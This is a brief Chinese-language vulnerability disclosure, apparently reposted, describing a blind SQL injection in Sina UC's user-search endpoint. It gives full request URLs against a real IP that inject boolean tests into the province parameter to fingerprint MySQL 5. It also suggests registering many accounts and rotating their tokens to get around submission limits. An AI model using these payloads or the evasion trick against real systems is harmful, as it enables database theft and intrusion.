盲注,需要登录,而且不能频繁提交,没深入测试,太蛋痛 漏洞 证明:真做简单测试,太蛋痛了,不过这可以整个UC的库; 登录UC后,抓到uid和tgt然后提交 http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=5%20and%20'1'='1 http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=4%20and%20'1'='1 据此判断出是mysql5的 数据库 如果想要突破提交限制,可以注册大量的UC账号,一个账号的tgt提交三次请求,轮流提交 修复方案: 加强过滤 作者 xnet
查看更多关于新浪UC一个蛋痛的注入 - 网站安全 - 自学php的详细内容...